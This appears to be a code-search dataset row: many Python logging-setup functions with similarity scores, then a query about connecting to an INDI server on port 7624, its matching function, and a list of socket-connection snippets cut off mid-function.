"def create_logger(log_dir=None):\n if log_dir and not os.path.exists(log_dir):\n os.makedirs(log_dir)\n log_format = '%(asctime)s %(process)d [%(levelname)s] %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_format)\n logger = logging.getLogger('es_on_gke')\n if log_dir:\n log_file = os.path.join(log_dir, 'log.txt')\n file_hdl = logging.FileHandler(log_file)\n formatter = logging.Formatter(fmt=log_format)\n file_hdl.setFormatter(formatter)\n logger.addHandler(file_hdl)\n return logger", "def create_logger(log_dir):\n logger = logging.getLogger(__file__)\n logger.setLevel(logging.INFO)\n\n # file logger\n log_filename = \"probabilist_connectogram_%s.log\" % time.strftime(\"%Y-%m-%d_%H:%M:%S\")\n if log_dir:\n log_path = os.path.join(log_dir, log_filename)\n else:\n log_path = log_filename\n file_handler = logging.FileHandler(log_path)\n formatter = logging.Formatter('%(asctime)s :: %(message)s')\n file_handler.setFormatter(formatter)\n file_handler.setLevel(logging.DEBUG)\n logger.addHandler(file_handler)\n\n # console logger\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n logger.info(\"Log path: %s\" % log_path)\n\n return logger", "def setup_logger(filename):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n fh = logging.FileHandler(filename)\n fh.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n\n mac_addr = hex(uuid.getnode()).replace('0x', '')\n formatter = logging.Formatter(\n f'%(asctime)s - %(levelname)s - {mac_addr} - %(name)s: %(message)s')\n\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n logger.info('Logger is created.')", "def log(string):\n\n print string\n\n# data and time\n dt = datetime.now().strftime(\"%b %d %H:%M:%S\")\n\n# check if log file exist / if not create it\n check_logf = os.path.isfile(logfile)\n if check_logf == False:\n os.system(\"touch %s\" % (logfile))\n firstlog = \"%s %s jadm: jadm log file was created!\" % (dt, os.uname()[1])\n os.system(\"echo '%s' > %s\" % (firstlog, logfile))\n\n# applay string to log file\n string = \"%s %s jadm: %s\" % (dt, os.uname()[1], string)\n os.system(\"echo '%s' >> %s\" % (string, logfile))", "def setupLogger():\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)s %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='prepareToSubmit.log',\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)", "def setup_logging(log_filename):\n # set up logging to file - see previous section for more details\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename=log_filename,\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)", "def setup_audit_log(cfg=CFG):\n if not runez.DRYRUN and not runez.log.file_handler:\n runez.log.setup(\n file_format=\"%(asctime)s %(timezone)s [%(process)d] %(context)s%(levelname)s - %(message)s\",\n file_level=logging.DEBUG,\n file_location=cfg.meta.full_path(\"audit.log\"),\n greetings=\":: {argv}\",\n rotate=\"size:500k\",\n rotate_count=1,\n )", "def writeToLogFile(self, event):\n outPutStr = '{:013}'.format(0)\n logOutPutStr = outPutStr + '\\t' + '{:.2f}'.format (time ()) + '\\t' + event + '\\t' + datetime.fromtimestamp (int (time())).isoformat (' ')\n printOutPutStr = outPutStr + '\\t' + datetime.fromtimestamp (int (time())).isoformat (' ') + '\\t' + event\n print (printOutPutStr)\n if self.logFP is not None:\n self.logFP.write(logOutPutStr + '\\n')\n self.logFP.flush()", "def _init_logger(self):\n # Create log directory, if it doesn't already exist.\n self._create_directory(directory=self._log_directory)\n log_filename = \"{0}/{1}.log\".format(self._log_directory, self._program)\n\n # Add the date to the log file names.\n logging.basicConfig(\n filename=log_filename,\n filemode='w',\n level=logging.DEBUG,\n format='%(asctime)s|%(name)s|%(levelname)-5s| %(message)s',\n datefmt='%Y-%m-%d %I:%M:%S %p')\n\n # define a Handler which writes LOG messages or higher to the sys.stderr\n console = logging.StreamHandler()\n #\n # Note: Anything above the logging level is displayed to stdout.\n #\n # Level Numeric value\n # CRITICAL\t50\n # ERROR \t40\n # WARNING\t30\n # LOG 25 (our log level)\n # INFO\t 20\n # DEBUG \t10\n # NOTSET\t0\n #\n # Add a logging level to always display to stderr.\n logging.addLevelName(self._LOG_LEVEL, self._LOG_NAME)\n if self._debug:\n console.setLevel(logging.DEBUG)\n else:\n console.setLevel(self._LOG_LEVEL)\n # Set a format which is simpler for console use.\n formatter = logging.Formatter('%(name)s|%(levelname)-5s| %(message)s')\n console.setFormatter(formatter)\n # Add the handler to the root logger.\n logging.getLogger('').addHandler(console)\n self._logger = logging.getLogger()", "def setup_logger():\n logger = logging.getLogger('tracking_log')\n logger.setLevel(logging.INFO)\n #Where to Store needs to be identified?\n f_handler = logging.FileHandler(PROCESSED_LOGFILE, mode='a', encoding = None, delay = False)\n f_handler.setLevel(logging.INFO)\n f_format = logging.Formatter('%(asctime)s\\t%(message)s\\t%(dataset_id)s\\t%(status)s')\n f_handler.setFormatter(f_format)\n logger.addHandler(f_handler)\n return logger", "def log(log_directory):\n\n format = \"%(asctime)s %(name)s %(levelname)s [%(module)s.%(funcName)s] %(message)s\"\n datefmt = \"%Y-%m-%d %H:%M:%S\"\n level = 0\n\n # Log to console\n logging.basicConfig(level=level, format=format, datefmt=datefmt, stream=sys.stdout)\n\n # Silence boto errors\n logging.getLogger(\"boto\").setLevel(logging.CRITICAL)\n\n # Log file\n if log_directory is not None:\n filename = \"%s/elastiq.log\" % log_directory\n\n # Try to create log directory and file\n try:\n if not os.path.isdir(log_directory):\n os.makedirs(log_directory, 0755)\n log_file = logging.handlers.RotatingFileHandler(filename, mode=\"a\", maxBytes=1000000, backupCount=30)\n log_file.setLevel(level)\n log_file.setFormatter( logging.Formatter(format, datefmt) )\n logging.getLogger(\"\").addHandler(log_file)\n log_file.doRollover() # rotate immediately\n except Exception, e:\n logging.warning(\"Cannot log to file %s: %s: %s\" % (filename, type(e).__name__, e))\n return None\n else:\n # No log directory\n return None\n\n return filename", "def log_transfer(function, pid, timestamp, timestampend):\n # see if we should log this\n enable = arizonaconfig.get_option(\"enablelogging\")\n logdir = arizonaconfig.get_option(\"logdir\")\n if not enable:\n return\n\n logfile= logdir + \"/\" + get_transfer_log_filename()\n\n # prepare the string\n writeout = function + \" \" + timestamp + \" \" + timestampend + \" \" + pid + \"\\n\"\n\n # try to append to the file\n try:\n tempfile = open(logfile, \"a\")\n tempfile.write(writeout)\n tempfile.close()\n except:\n pass", "def setup_logging(\n level,\n console_level,\n file_level,\n):\n global _LOGGING_INITIALIZED\n if _LOGGING_INITIALIZED:\n logging.debug('SetupLogging: logging system already initialized')\n return\n\n program_name = get_program_name()\n logging.addLevelName(LogLevel.DEBUG_VERBOSE, 'DEBUG_VERBOSE')\n logging.addLevelName(LogLevel.ALL, 'ALL')\n\n # Initialize the logging system:\n\n log_formatter = logging.Formatter(\n fmt='%(asctime)s %(levelname)s %(filename)s:%(lineno)s : %(message)s',\n )\n\n log_formatter.formatTime = _format_time\n\n logging.root.handlers.clear()\n logging.root.setLevel(level)\n\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(log_formatter)\n console_handler.setLevel(console_level)\n logging.root.addHandler(console_handler)\n\n # Initialize log dir:\n tstamp = timestamp()\n pid = os.getpid()\n\n if FLAGS.log_dir is None:\n tmp_dir = os.path.join('/tmp', getpass.getuser(), program_name)\n make_dir(tmp_dir)\n FLAGS.log_dir = tempfile.mkdtemp(\n prefix='%s.%d.' % (tstamp, pid),\n dir=tmp_dir)\n\n # Link current log dir to latest:\n latest_path = os.path.join(tmp_dir, \"latest\")\n remove(latest_path)\n os.symlink(src=os.path.basename(FLAGS.log_dir), dst=latest_path)\n\n logging.info('Using log dir: %s', FLAGS.log_dir)\n make_dir(FLAGS.log_dir)\n\n log_file = os.path.join(FLAGS.log_dir, '%s.%s.%d.log' % (program_name, tstamp, pid))\n\n # Link current log file to latest.log:\n latest_path = os.path.join(FLAGS.log_dir, \"latest.log\")\n remove(latest_path)\n os.symlink(src=log_file, dst=latest_path)\n\n file_handler = logging.FileHandler(filename=log_file)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(file_level)\n logging.root.addHandler(file_handler)\n\n from base import log\n log.set_logger(log.Logger(level=log.Level.ALL))\n\n _LOGGING_INITIALIZED = True", "def write_log(self, logfile='./src/movement_log.txt'):\n # TODO: parameterize logfile name\n print('Writing logs...')\n f = open(logfile, \"w\")\n for command in self.log_arr:\n f.write(command + \"\\n\")\n print('Writing finished')", "def write_log(*args):\n\n with open(\"server.log\", 'a') as log_file:\n log_file.write(datetime.now().isoformat() + \"\\t\")\n log_file.write(\"\\n\".join(args))\n log_file.write(\"\\n\")", "def setup_logging(filepath=core.ServerConfiguration.LOGDIR,\n log_name='server_process'):\n\n if not os.path.exists(filepath):\n raise IOError('LOG_DIR filepath does not exist: {0:s}'.format(filepath))\n\n if not log_name in core.DEFAULT_LOGGER_PROCESSES:\n raise ValueError('Log_name should be in {0:s}.'\n .format(core.DEFAULT_LOGGER_PROCESSES))\n\n filename = generate_log_filename()\n log_file = os.path.join(filepath, filename)\n\n # configure log formatter\n log_fmt = logging.Formatter('[%(levelname)s][%(asctime)s] %(message)s',\n datefmt='%Y/%m/%d %I:%M:%S %p')\n\n # configure file handler\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(log_fmt)\n\n # stream handler\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(log_fmt)\n\n # setup a server log, add file and stream handlers\n logger = logging.getLogger(log_name)\n logger.addHandler(file_handler)\n logger.addHandler(stream_handler)\n logger.setLevel(logging.DEBUG)\n\n return log_file", "def _logToFile(logsLst, resultJSON=None, logFile=\"logFile.txt\"):\n if not LOGGING_TO_FILE: return\n with open(logFile, \"a+\") as file:\n message = \"\\n\".join(logsLst)\n file.write(\"------------------Logging--------------------\\n\")\n file.write(str(datetime.datetime.now()) + \"\\n\")\n # file.write(str(datetime.datetime.utcnow()) + \"\\n\")\n file.write(\"---------------------------------------------\\n\")\n file.write(message + \"\\n\")\n if resultJSON is not None:\n file.write(\"resulting JSON after comparison:\\n\")\n file.write(resultJSON)\n file.write(\"\\n\")", "def config_logger(log_level):\n try:\n logfile = os.path.expanduser(os.path.join(\"~\", \".parallelcluster\", \"awsbatch-cli.log\"))\n logdir = os.path.dirname(logfile)\n os.makedirs(logdir)\n except OSError as e:\n if e.errno == errno.EEXIST and os.path.isdir(logdir):\n pass\n else:\n fail(\"Cannot create log file (%s). Failed with exception: %s\" % (logfile, e))\n\n formatter = logging.Formatter(\"%(asctime)s %(levelname)s [%(module)s:%(funcName)s] %(message)s\")\n\n logfile_handler = RotatingFileHandler(logfile, maxBytes=5 * 1024 * 1024, backupCount=1)\n logfile_handler.setFormatter(formatter)\n\n logger = logging.getLogger(\"awsbatch-cli\")\n logger.addHandler(logfile_handler)\n try:\n logger.setLevel(log_level.upper())\n except (TypeError, ValueError) as e:\n fail(\"Error setting log level. Failed with exception: %s\" % e)\n\n return logger", "def setup_logging(logfile_name=None, do_logging=True, level=logging.DEBUG):\n # pylint: disable-msg=C0111\n if do_logging and logfile_name:\n logging.basicConfig(level=level, filename=logfile_name, filemode=\"w\",\n datefmt='%a, %d %b %Y %H:%M:%S',\n format=\"%(asctime)s %(name)s %(levelname)-8s %(message)s\")\n else:\n class LogSink(object):\n def write(self, *args, **kwargs):\n pass\n def flush(self, *args, **kwargs):\n pass\n logging.basicConfig(stream=LogSink())", "def setup_logging(log_file):\n\tglobal logger\n\tif log_file:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',filename=log_file,filemode='w',level=logging.INFO)\n\telse:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',level=logging.INFO)\n\tlogger = logging.getLogger('default')", "def new_custom_log_dir(self) -> str:", "def setup_logging(verbose=True,logfile=None):\n l=logging.getLogger()\n \n l.setLevel(logging.DEBUG if verbose else logging.INFO)\n \n formatter=logging.Formatter(\"[%(asctime)s] %(levelname)-6s %(name)-35s %(message)s \")\n \n if logfile!=None:\n handler=logging.FileHandler(logfile)\n else:\n handler=logging.StreamHandler()\n \n handler.setFormatter(formatter)\n l.addHandler(handler)", "def saveToLogFile(self, msg):\n path = os.path.join(self.parent.progpath, \"logfile.txt\")\n fo = open(path, 'a')\n # prefix with current date and time from now variable\n msg = \"\\n#{0}\\n\".format(datetime.datetime.now()) + msg\n fo.write(msg)\n fo.close()", "def saveToLogFile(self, msg):\n path = os.path.join(self.parent.progpath, \"logfile.txt\")\n fo = open(path, 'a')\n # prefix with current date and time from now variable\n msg = \"\\n#{0}\\n\".format(datetime.datetime.now()) + msg\n fo.write(msg)\n fo.close()", "def setupfilelogging(LogFileName):\n\n Logger = logging.getLogger(LoggerName)\n Logger.setLevel(logging.INFO)\n\n# Create a console log\n\n ConsoleLog = logging.StreamHandler()\n ConsoleLog.setLevel(logging.DEBUG)\n\n# Create a logging format and add to the logging streams\n\n formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n\n LogFormat = logging.Formatter('%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n ConsoleLog.setFormatter(LogFormat)\n\n# Add the console log stream to the logger\n\n Logger.addHandler(ConsoleLog)\n\n FileLog = logging.FileHandler(LogFileName)\n FileLog.setLevel(logging.DEBUG)\n FileLog.setFormatter(LogFormat)\n\n Logger.addHandler(FileLog)\n\n return Logger", "def init_log(log_instance):\r\n base_dir = os.path.dirname(os.path.abspath(__file__))\r\n log_dir = os.path.join(base_dir, \"logs\")\r\n if not os.path.exists(log_dir):\r\n os.makedirs(log_dir)\r\n log_file = log_instance + \"_\" + datetime.datetime.now().strftime(\"%Y-%m-%d\") + \".log\"\r\n logging_conf = {\r\n \"version\": 1,\r\n \"disable_existing_loggers\": False,\r\n \"formatters\": {\r\n \"simple\": {\r\n 'format': '%(asctime)s [%(filename)s:%(lineno)d] [%(levelname)s]- %(message)s'\r\n },\r\n 'standard': {\r\n 'format': '%(asctime)s [%(threadName)s:%(thread)d] [%(filename)s:%(lineno)d] [%(levelname)s]- %(message)s'\r\n },\r\n },\r\n\r\n \"handlers\": {\r\n \"console\": {\r\n \"class\": \"logging.StreamHandler\",\r\n \"level\": \"DEBUG\",\r\n \"formatter\": \"simple\",\r\n \"stream\": \"ext://sys.stdout\"\r\n },\r\n\r\n \"default\": {\r\n \"class\": \"logging.handlers.RotatingFileHandler\",\r\n \"level\": \"DEBUG\",\r\n \"formatter\": \"standard\",\r\n \"filename\": os.path.join(log_dir, log_file),\r\n 'mode': 'w+',\r\n \"maxBytes\": 1024 * 1024 * 5, # 5 MB\r\n \"backupCount\": 20,\r\n \"encoding\": \"utf8\"\r\n },\r\n },\r\n\r\n \"root\": {\r\n 'handlers': ['default', 'console'],\r\n 'level': \"INFO\",\r\n 'propagate': False\r\n }\r\n }\r\n\r\n logging.config.dictConfig(logging_conf)\r\n\r\n # configure application log\r\n return logging.getLogger(log_instance)", "def log_setup():\n logger = logging.getLogger('diskover')\n logger_warn = logging.getLogger('diskover_warn')\n eslogger = logging.getLogger('elasticsearch')\n diskover_eslogger = logging.getLogger('diskover_elasticsearch')\n loglevel = config['logLevel'].get()\n if options.debug:\n loglevel = 'DEBUG'\n if loglevel == 'DEBUG':\n loglevel = logging.DEBUG\n elif loglevel == 'INFO':\n loglevel = logging.INFO\n else:\n loglevel = logging.WARN\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n if logtofile:\n # create log file name using top dir names and datestamp\n treedirsstr = ''\n if args:\n n = 1\n dirs = args[0:]\n x = len(dirs)\n for d in dirs:\n if d != '/':\n d = d.rstrip('/')\n treedirsstr += os.path.basename(d)\n if n < x:\n treedirsstr += '_'\n n += 1\n else:\n treedirsstr = os.path.basename(os.getcwd())\n logfiletime = datetime.now().isoformat()\n logname = 'diskover_' + treedirsstr + '_' + logfiletime + '.log'\n logfile = os.path.join(logdir, logname)\n handler_file = logging.FileHandler(logfile)\n handler_file.setFormatter(logging.Formatter(logformat))\n logger.setLevel(loglevel)\n logger.addHandler(handler_file)\n # console logging\n handler_con = logging.StreamHandler()\n handler_con.setFormatter(logging.Formatter(logformat))\n logger.addHandler(handler_con)\n # warnings log\n logname_warn = 'diskover_' + treedirsstr + '_' + logfiletime + '_warnings.log'\n logfile_warn = os.path.join(logdir, logname_warn)\n handler_warnfile = logging.FileHandler(logfile_warn)\n handler_warnfile.setFormatter(logging.Formatter(logformat))\n logger_warn.setLevel(logging.WARN)\n logger_warn.addHandler(handler_warnfile)\n # es logger\n eslogger.setLevel(logging.WARN)\n eslogger.addHandler(handler_file)\n eslogger.addHandler(handler_con)\n # diskover es logger\n diskover_eslogger.setLevel(loglevel)\n diskover_eslogger.addHandler(handler_file)\n diskover_eslogger.addHandler(handler_con)\n else:\n handler_file = None\n handler_warnfile = None\n handler_con = None\n logging.basicConfig(format=logformat, level=loglevel)\n eslogger.setLevel(logging.WARN)\n return logger, logger_warn, loglevel, logformat, \\\n handler_file, handler_warnfile, handler_con", "def write_log(output_dir, texts, new_file=False):\n if new_file:\n f = open(os.path.join(output_dir, \"std.log\"), \"w\")\n else:\n f = open(os.path.join(output_dir, \"std.log\"), \"a\")\n f.write(str(texts) + \"\\n\")\n f.close()", "def config_logger(log_cfg_file, experiment_name=None, output_dir='logs'):\n timestr = time.strftime(\"%Y.%m.%d-%H%M%S\")\n exp_full_name = timestr if experiment_name is None else experiment_name + '___' + timestr\n logdir = os.path.join(output_dir, exp_full_name)\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n log_filename = os.path.join(logdir, exp_full_name + '.log')\n if os.path.isfile(log_cfg_file):\n logging.config.fileConfig(log_cfg_file, defaults={'logfilename': log_filename})\n msglogger = logging.getLogger()\n msglogger.logdir = logdir\n msglogger.log_filename = log_filename\n msglogger.info('Log file for this run: ' + os.path.realpath(log_filename))\n\n # Create a symbollic link to the last log file created (for easier access)\n try:\n os.unlink(\"latest_log_file\")\n except FileNotFoundError:\n pass\n try:\n os.unlink(\"latest_log_dir\")\n except FileNotFoundError:\n pass\n try:\n os.symlink(logdir, \"latest_log_dir\")\n os.symlink(log_filename, \"latest_log_file\")\n except OSError:\n msglogger.debug(\"Failed to create symlinks to latest logs\")\n return msglogger", "def logfile():\n\n class Logfile(object):\n def __init__(self, filename, *args, **kwargs):\n super(Logfile, self).__init__(*args, **kwargs)\n self.filename = filename\n self.logs = \"\"\n\n def read(self):\n with open(self.filename) as file:\n for line in file:\n self.logs += line\n return self.logs\n\n yield Logfile(filename=\"gen3tests.logs\")\n\n # cleanup after each use\n if os.path.exists(\"gen3tests.logs\"):\n os.remove(\"gen3tests.logs\")", "def create_logs(self):\n print(\"creating logs...\")\n with open(self.log_file,'w') as log:\n writer = csv.writer(log)\n writer.writerow(['population',\n 'avg_age',\n 'avg_surv',\n 'avg_repro',\n # 'avg_neighbors_1',\n # 'avg_neighbors_2',\n # 'avg_neighbors_3',\n # 'avg_neighbors_4',\n # 'avg_neighbors_5',\n # 'avg_neighbors_6',\n # 'avg_neighbors_7',\n # 'avg_neighbors_8',\n 'number_of_clusters',\n 'clusters_10e1',\n 'clusters_10e2',\n 'clusters_10e3',\n 'clusters_10e4',\n 'clusters_10e5'])\n print(\"Logs created @ {}\".format(self.log_file))", "def create_logger(app_name: str) -> logging.Logger:\n if not os.path.exists(os.path.join(os.getcwd(), 'logs')):\n os.mkdir(os.path.join(os.getcwd(), 'logs'))\n\n app_logfile = os.path.join(os.getcwd(), 'logs', f'{app_name}.log')\n\n logger = logging.getLogger(f\"{app_name}-logger\")\n logger.setLevel(logging.DEBUG)\n\n handler = logging.handlers.RotatingFileHandler(filename=app_logfile, mode='a', maxBytes=20000, backupCount=10)\n handler.setLevel(logging.DEBUG)\n\n # Set the formatter\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n handler.setFormatter(formatter)\n\n logger.addHandler(handler)\n\n # Set it as the base handler\n logger.base_handler = handler\n\n # Also add a newline handler to switch to later\n newline_handler = logging.FileHandler(filename=app_logfile, mode='a')\n newline_handler.setLevel(logging.DEBUG)\n newline_handler.setFormatter(logging.Formatter(fmt='')) # Must be an empty format\n \n logger.newline_handler = newline_handler\n\n # Also add the provision for a newline handler using a custom method attribute\n logger.newline = types.MethodType(add_newlines, logger)\n\n # Also add a StreamHandler for printing to stderr\n console_handler = logging.StreamHandler()\n formatter = logging.Formatter(\"%(asctime)s | %(levelname)s | %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n console_handler.setFormatter(formatter)\n \n logger.addHandler(console_handler)\n\n return logger", "def create_logger(\n project_name: str,\n level: str = \"INFO\",\n log_dir: str = \"/tmp/logs\",\n file_name: Optional[str] = None,\n do_print: bool = True,\n simple_logging: bool = False,\n log_to_file: bool = False,\n rich_logging: bool = False,\n time_zone: Optional[str] = None,\n):\n import __main__\n\n if file_name is None:\n try:\n file_name = ntpath.basename(__main__.__file__).split(\".\")[0]\n except:\n file_name = \"logs\"\n\n logger = logging.getLogger(file_name)\n logger.handlers.clear()\n logger.setLevel(getattr(logging, level))\n\n if time_zone:\n from pytz import timezone, utc\n def time_formatter(*args):\n # TODO: Doesnt work with rich formatter\n utc_dt = utc.localize(datetime.datetime.utcnow())\n my_tz = timezone(time_zone)\n converted = utc_dt.astimezone(my_tz)\n return converted.timetuple()\n\n logging.Formatter.converter = time_formatter\n\n if rich_logging:\n from rich.logging import RichHandler\n stream_format = f\"{project_name}:%(module)s:%(funcName)s: %(message)s\"\n stream_handler = RichHandler(omit_repeated_times=False)\n else:\n stream_format = f\"%(asctime)s:%(levelname)s:{project_name}:%(module)s:%(funcName)s: %(message)s\"\n stream_handler = logging.StreamHandler()\n\n file_formatter = stream_formatter = logging.Formatter(\n stream_format, \"%Y-%m-%d %H:%M:%S\"\n )\n\n if simple_logging:\n file_formatter = logging.Formatter(\"%(message)s\")\n stream_formatter = logging.Formatter(\"%(message)s\")\n\n if log_to_file:\n date = datetime.date.today()\n date = \"%s-%s-%s\" % (date.day, date.month, date.year)\n log_file_path = os.path.join(log_dir, \"%s-%s.log\" % (file_name, date))\n\n create_folder(log_dir)\n file_handler = logging.FileHandler(log_file_path)\n file_handler.setFormatter(file_formatter)\n logger.addHandler(file_handler)\n\n if do_print:\n stream_handler.setFormatter(stream_formatter)\n logger.addHandler(stream_handler)\n\n logger.propagate = False\n\n return logger" ]
[ "0.77096045", "0.7498354", "0.70676357", "0.7021383", "0.69633764", "0.69220144", "0.6866777", "0.68400943", "0.6803973", "0.6764277", "0.6756204", "0.6751284", "0.6738857", "0.67022955", "0.66923296", "0.66836953", "0.6674281", "0.66629696", "0.6649449", "0.664781", "0.65934724", "0.6592122", "0.65892506", "0.6588697", "0.65575695", "0.6554836", "0.65529484", "0.654721", "0.6547151", "0.6542076", "0.6533464", "0.651822", "0.651507", "0.6510564", "0.6507167", "0.65057844", "0.64957684", "0.6493811", "0.6476424", "0.6472297", "0.6469401", "0.64654124", "0.64590836", "0.6439904", "0.6439229", "0.643861", "0.6433912", "0.64294976", "0.6418758", "0.64175475", "0.64115894", "0.6390008", "0.63821465", "0.6381992", "0.63541514", "0.63531965", "0.6337093", "0.6334821", "0.63253963", "0.6324189", "0.63235635", "0.6317176", "0.6317126", "0.6316617", "0.6316466", "0.631509", "0.63092476", "0.6301707", "0.62920797", "0.6291294", "0.62726796", "0.6269962", "0.6260645", "0.6260045", "0.6256005", "0.62466365", "0.62412286", "0.6223468", "0.6220512", "0.6213147", "0.62019604", "0.6193072", "0.6191967", "0.61735326", "0.61641145", "0.61619073", "0.6158918", "0.61560625", "0.6153982", "0.6152658", "0.6152658", "0.6151933", "0.6148791", "0.61391807", "0.6130558", "0.61299264", "0.6127356", "0.61239386", "0.612246", "0.61168784" ]
0.6588597
24
Establish a TCP connection to the indiserver via port 7624
def connect_to_indi(): indiclient=IndiClient() indiclient.setServer("localhost",7624) # Ensure the indiserver is running if (not(indiclient.connectServer())): print("No indiserver running on "+indiclient.getHost()+":"+str(indiclient.getPort())+" - Try to run") print(" indiserver indi_sx_ccd") sys.exit(1) return indiclient
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def SCPI_sock_connect(ipaddress,port=5025):\n\n try:\n session=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #session.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 0)\n #session.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, 0)\n session.connect((ipaddress,port))\n except IOError:\n print( \"Failed to connect to the instrument, pleace check your IP address\" )\n return\n return session", "def connect_to_server(self):\r\n self.client_socket.connect((SERVER_IP, SERVER_PORT))\r\n print('[CLIENT] connected to streamer.')", "def connect(self) -> None:\n self.s.connect((self.ip, self.port))", "def connect(self):\n self.socket.connect((\"localhost\",self.PORT_NUM))", "def connect(self):\n sock_version = socket.AF_INET if self.ip_version == 4 else socket.AF_INET6\n with socket.socket(sock_version, socket.SOCK_STREAM) as sock:\n sock.connect((self.server_ip, self.port))\n print(\"Client connected\")\n self.__send_request(\"01\", sock)\n\n while True:\n response = self.__receive_response(sock)\n if len(response) >= 2:\n msg_id_code = int(response[:2])\n if msg_id_code == 2:\n udp_port = self.__request_info_file(response, sock)\n if msg_id_code == 4:\n self.__handle_udp_transfer(self.server_ip, udp_port, sock)\n if msg_id_code == 5:\n print(\"Closing connection\")\n sock.close()\n return 0\n if msg_id_code == 8:\n print(\"Invalid file name. Max size: 15bytes\")\n sock.close()\n return -1", "def make_connection( hostname, port = 4663 ):\n \tconnection = socket.socket();", "def _connect(self):\n hostport = self.getHost()\n channelOpenData = forwarding.packOpen_direct_tcpip((self.host, self.port), (hostport.host, hostport.port))\n self.connector.connection.openChannel(self, channelOpenData)", "def connectToServer(self):\n self.client = Client(base_url = self.server)\n self.ping()", "def connect(self):\n print(\"Connecting\")\n self.socket.connect((self.ip, self.port))\n self.startReading()", "def init_connection(srv_ip, srv_port):\n svrsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n srvaddr = (srv_ip, srv_port)\n svrsock.bind(srvaddr)\n print('Laptop IP:', srv_ip)\n print('Laptop Port:', srv_port)\n svrsock.listen(1)\n print('waiting to be connected...')\n clnsock, clnaddr = svrsock.accept()\n print('\\nconnected!\\n')\n print('IOS IP:', clnaddr[0])\n print('IOS PORT:', clnaddr[1])\n svrsock.settimeout(0)\n clnsock.settimeout(0)\n return svrsock, clnsock, clnaddr", "def opensock(ipaddr,port):\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect((ipaddr,port))\n \n return s", "def connect(self):\n self.conn.connect()", "def connectToServer(self):\r\n\t\tself.rtspSocket_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ttry:\r\n\t\t\tself.rtspSocket_client.connect((self.serverAddr, self.serverPort))\r\n\t\texcept:\r\n\t\t\tprint(\"Fail to connect to server\")", "def connect(self, host, port):\n pass", "def open_tcp_port():\n \n # Open an incoming tcp port to access the cluster endpoint\n try:\n vpc = ec2.Vpc(id=myClusterProps['VpcId'])\n defaultSg = list(vpc.security_groups.all())[0]\n print(defaultSg)\n defaultSg.authorize_ingress(\n GroupName=defaultSg.group_name,\n CidrIp='0.0.0.0/0',\n IpProtocol='TCP',\n FromPort=int(DWH_PORT),\n ToPort=int(DWH_PORT)\n )\n except Exception as e:\n print(e)", "def _connect_socket(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.connect((self.ip, self.port))\n print(\"Connected to %s at port %d\" % (self.ip, self.port))", "def init_connexion():\n connexion = socket(AF_INET, SOCK_STREAM)\n connexion.bind((hote, port))\n\n return connexion", "def start(self):\n self.port = self.conn.evalInServer(server_code.format(key=self.key))", "def establish_connection(self):\n print('Listening...')\n self.socket.listen()\n self.conn, addr = self.socket.accept()\n print('Received connection', addr)", "def start(self):\n # create socket\n try:\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # 10 minutes for timeout\n self._socket.settimeout(600)\n except socket.error as msg:\n logging.error(\"Can't create socket. Error code: {}, msg: {}\".format(*msg))\n raise\n\n # Open TCP connection\n try:\n self._socket.connect(self.address)\n except socket.error:\n logging.error(\"Can't connect to the server on {}:{}\".format(*self.address))\n raise", "def connect(self):\n self.ipv4 = socket.gethostbyname(socket.gethostname())\n self.addr = (self.ipv4, HttpServer.PORT)\n self.server.bind(self.addr)\n print(\"[SETUP] server bound to IPv4 address\", self.ipv4, \"on port\", HttpServer.PORT)\n self.server.listen()\n print(\"[SETUP] server listening for connections\")", "def connect(self):\n self.sock = s.socket(s.AF_INET,s.SOCK_STREAM)\n self.sock.connect((self.remote_host,\n self.remote_port))", "def connect(self, addr):\n self._outbound = True\n rules = firewall.DefaultRule()\n self._state = SocketState(self._got_remote)\n self._endpoint = SocketEndpoint(rules, None)\n self._i2cp 